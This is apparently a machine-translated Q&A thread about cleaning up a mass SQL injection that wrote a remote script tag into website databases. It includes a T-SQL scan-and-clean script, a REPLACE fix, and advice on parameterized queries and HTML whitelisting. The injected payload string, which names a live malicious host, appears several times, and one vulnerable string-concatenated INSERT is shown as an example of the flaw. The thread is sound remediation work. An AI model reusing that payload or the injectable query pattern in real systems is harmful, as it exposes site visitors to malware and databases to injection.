Security 破译这次XSS攻击
有人知道这次袭击的更多信息吗 我最近在我的网站上注入了这个脚本 顺便说一句,不要上这个网站,因为它是感染源 它是什么类型的攻击,SQL还是代码 顺便说一句,不要上这个网站,因为它是感染源 问题是这种传染病发作的原因是什么 我们发现了它,它不像twitter攻击,它是通过url中的请求参数直接在参数中注入sql 有一个SQL脚本由我们的SQL团队生成,用于清理被感染的数据库Security 破译这次XSS攻击,security,iis,sql-injection,Security,Iis,Sql Injection,有人知道这次袭击的更多信息吗 我最近在我的网站上注入了这个脚本 顺便说一句,不要上这个网站,因为它是感染源 它是什么类型的攻击,SQL还是代码 顺便说一句,不要上这个网站,因为它是感染源 问题是这种传染病发作的原因是什么 我们发现了它,它不像twitter攻击,它是通过url中的请求参数直接在参数中注入sql 有一个SQL脚本由我们的SQL团队生成,用于清理被感染的数据库 /*************************************************************
/*************************************************************************
SQL INJECTED DATABASE
*************************************************************************/
DECLARE @dbName VARCHAR(200),
@SqlString NVARCHAR(MAX),
@SearchText VARCHAR(MAX),
@SearchTextLike VARCHAR(MAX),
@NbItems INT,
@TableName VARCHAR(255),
@ColoneName VARCHAR(255),
@objId BIGINT,
@tmpSqlString NVARCHAR(MAX),
@CleanUp BIT,
@RowCount BIGINT,
@debug BIT,
@Msg VARCHAR(MAX);
SET @debug = 0; -- 1 = Additionnal prints
SET @CleanUp = 0; -- 1 = Update tables
SET @SearchText = '</title><script src=http://google-stats50.info/ur.php></script>';
SET @SearchTextLike = '%' + @SearchText + '%';
DECLARE @QueryResults TABLE (SqlString VARCHAR(MAX), TableName VARCHAR(255), ColoneName VARCHAR(255));
DECLARE @InfectedDB TABLE (InfectedDbName VARCHAR(255));
DECLARE @CleanedUpDB TABLE (DbName VARCHAR(255), Msg VARCHAR(MAX));
DECLARE @DbToValidate TABLE (DbName VARCHAR(255));
INSERT INTO @DbToValidate
SELECT Name
FROM sys.databases
WHERE [state] = 0 AND
Name NOT IN ('master', 'tempdb', 'model', 'msdb') AND
Name NOT LIKE 'sys%'
ORDER BY Name;
DECLARE db_cusor CURSOR FOR
SELECT DbName
FROM @DbToValidate;
OPEN db_cusor;
FETCH NEXT FROM db_cusor
INTO @dbName;
WHILE @@FETCH_STATUS = 0
BEGIN
SET @Msg = 'Traitement pour : ' + @dbName;
INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
PRINT @Msg;
IF (SELECT [state] FROM sys.databases WHERE Name = @dbName) = 0
BEGIN
IF @debug = 1 PRINT Char(13) + '1 - Processing Database : ' + @dbName;
--Vider le contenu
DELETE FROM @QueryResults;
IF @debug = 1 PRINT '2 - Vider la table @QueryResults';
IF @CleanUp = 0
BEGIN
SET @SqlString = ' USE [' + @dbName + '];' +
' SELECT ''SELECT @NbItems = COUNT(1) FROM ['' + tbl.Name + ''] WHERE ['' + col.name + ''] LIKE ''''' + @SearchTextLike + ''''''', tbl.Name, col.Name' +
' FROM sys.tables tbl inner join' +
' sys.columns col on tbl.object_id = col.object_id' +
' WHERE col.system_type_id IN (35, 99, 167, 175, 231, 239) and tbl.Name not like ''sys%''';
END
ELSE
BEGIN
SET @SqlString = ' USE [' + @dbName + '];' +
' SELECT ''UPDATE ['' + tbl.Name + ''] SET ['' + col.name + ''] = REPLACE(CAST(['' + col.name + ''] AS VARCHAR(MAX)),''''' + @SearchText + ''''','''''''') FROM ['' + tbl.Name + ''] WHERE ['' + col.name + ''] LIKE ''''' + @SearchTextLike + ''''''', tbl.Name, col.Name' +
' FROM sys.tables tbl inner join' +
' sys.columns col on tbl.object_id = col.object_id' +
' WHERE col.system_type_id IN (35, 99, 167, 175, 231, 239) and tbl.Name not like ''sys%'''
END
INSERT INTO @QueryResults
EXEC sp_executesql @SqlString;
--Validation pour les erreurs
IF @@ERROR <> 0
BEGIN
GOTO NEXTPRINC
END
IF @debug = 1 PRINT '3 - Récupérer les Query String';
--Faire une loop sur les querys string pour voir s'il y a des injections SQL
DECLARE query_cursor CURSOR FOR
SELECT SqlString, TableName, ColoneName
FROM @QueryResults;
OPEN query_cursor;
FETCH NEXT FROM query_cursor
INTO @SqlString, @TableName, @ColoneName;
IF @debug = 1 PRINT '4 - Cursor sur les Query String';
WHILE @@FETCH_STATUS = 0
BEGIN
SET @tmpSqlString = 'USE [' + @dbName + '];' + 'SELECT @objId = OBJECT_ID(''' + @TableName + ''');'
EXEC sp_executesql @tmpSqlString, N'@objId bigint output', @objId output
--Validation pour les erreurs
IF @@ERROR <> 0
BEGIN
GOTO NEXTINNER
END
IF ISNULL(@objId, -1) <> -1
BEGIN
SET @SqlString = 'USE [' + @dbName + '];' + @SqlString;
IF @CleanUp = 0
BEGIN
EXEC sp_executesql @SqlString, N'@NbItems int output', @NbItems output
END
ELSE
BEGIN
EXEC sp_executesql @SqlString
SET @RowCount = @@ROWCOUNT
END
--Validation pour les erreurs
IF @@ERROR <> 0
BEGIN
GOTO NEXTINNER
END
IF @CleanUp = 0
BEGIN
IF ISNULL(@NbItems, 0) <> 0
BEGIN
-- BD Infectée !
INSERT INTO @InfectedDB VALUES (@dbName);
PRINT '**** BD Infectée : ' + @dbName;
SELECT * FROM @InfectedDB;
BREAK;
END
END
ELSE
BEGIN
IF @RowCount <> 0
BEGIN
SET @Msg = '**** Table --> [' + @TableName + '] .::. Colonne --> [' + @ColoneName + '] .::. Nb Rows --> ' + CAST(@RowCount AS VARCHAR(7));
INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
PRINT @Msg;
END
END
END
NEXTINNER:
-- Get the next query.
FETCH NEXT FROM query_cursor
INTO @SqlString, @TableName, @ColoneName;
END
CLOSE query_cursor;
DEALLOCATE query_cursor;
IF @debug = 1 PRINT '5 - Vider cursor query';
END
ELSE
BEGIN
SET @Msg = '**** La base de données n''est pas ''ONLINE''.';
INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
PRINT @Msg;
END
SET @Msg = 'Fin traitement pour : ' + @dbName;
INSERT INTO @CleanedUpDB VALUES (@dbName, @Msg);
PRINT @Msg;
NEXTPRINC:
-- Get the next database.
FETCH NEXT FROM db_cusor
INTO @dbName;
END
IF @CleanUp = 0
BEGIN
SELECT * FROM @InfectedDB;
END
ELSE
BEGIN
SELECT * FROM @CleanedUpDB;
END
GOTO FIN
FININNER:
CLOSE query_cursor;
DEALLOCATE query_cursor;
FIN:
--Fermeture du cursor
CLOSE db_cusor;
DEALLOCATE db_cusor;
我们也是这样。数据库中几乎所有的记录 最好的办法是做到以下几点:我们刚刚成功地做到了这一点
UPDATE [mytable] set [column] =
REPLACE([column],
'</title><script src=http://google-stats50.info/ur.php>',
'')
该行将从每个字段中删除脚本。但是,您必须手动检查字段,并更改UPDATE语句以适应需要
我猜你们每个人的网站上都有一个带有提交按钮的表单。我还猜测forms操作涉及一个带有连接sql的sql语句
"INSERT INTO tbl_Contacts (name, email, enquiry) VALUES ('" & \
name & "', '" & email & "', '" & enquiry & "');"
如果是这种情况,那么SQL注入遭到攻击,您可能应该将所有使用此语法的语句更改为参数化查询
"INSERT INTO tbl_Contacts (name, email, enquiry) VALUES (@name, @email, @enquiry);"
sqlcommand.parameters.add("@name", SqlDbType.VarChar).Value = foo
sqlcommand.parameters.add("@email", SqlDbType.VarChar).Value = bar
sqlcommand.parameters.add("@enquiry", SqlDbType.VarChar).Value = baz
希望这有帮助。今天早上我们遇到了同样的问题。
sql注入的典型案例:您似乎没有检查通过URL获得的参数。查看Web服务器访问日志-您将看到更新语句 经典XSS攻击。您应该检查输入的HTML标记并删除它们。如果你允许人们发布HTML标记,那么你应该为允许的标记和允许的标记属性使用一个白名单,这样他们就不能进行onClick,例如,而不是试图阻止那些你认为可能会引起麻烦的标记。我最近修复了一个类似的攻击,every.asp,受感染服务器上的.js和.html文件包含了额外的脚本,但数据库正常。在这种情况下,黑客是通过FTP进行的,密码不够强。也许类似的事情发生在你身上
我在一个支持多个文档的文本编辑器中用“查找并替换全部”修复了它。notepad++我不知道这是什么,也不知道如何修复,但谷歌显示了大约740个其他类似感染的网站。请不要更改脚本的url@塞德里克,请告诉我为什么在一个每天有250万访问量的网站的首页上写下这个危险网站的域名是个好主意。你是想宣传吗?!不,我不想推广它,但如果我想解决这个问题,请告诉我如果我不提供正确的信息,我该如何解决它。@Cédric发布病毒链接是一种不良行为,与您网站的安全漏洞无关。提供的正确信息应该是被利用的代码。今天早上我们遇到了完全相同的问题。一些回答告诉我,我不确定是代码攻击还是直接攻击sql server,因为.net网站和asp classic网站受到攻击该网站不包含用于推荐白名单的表单+1。在我的情况下,数据库受到感染,页面从数据库呈现content@badp:谢谢你的整理:
"INSERT INTO tbl_Contacts (name, email, enquiry) VALUES (@name, @email, @enquiry);"
sqlcommand.parameters.add("@name", SqlDbType.VarChar).Value = foo
sqlcommand.parameters.add("@email", SqlDbType.VarChar).Value = bar
sqlcommand.parameters.add("@enquiry", SqlDbType.VarChar).Value = baz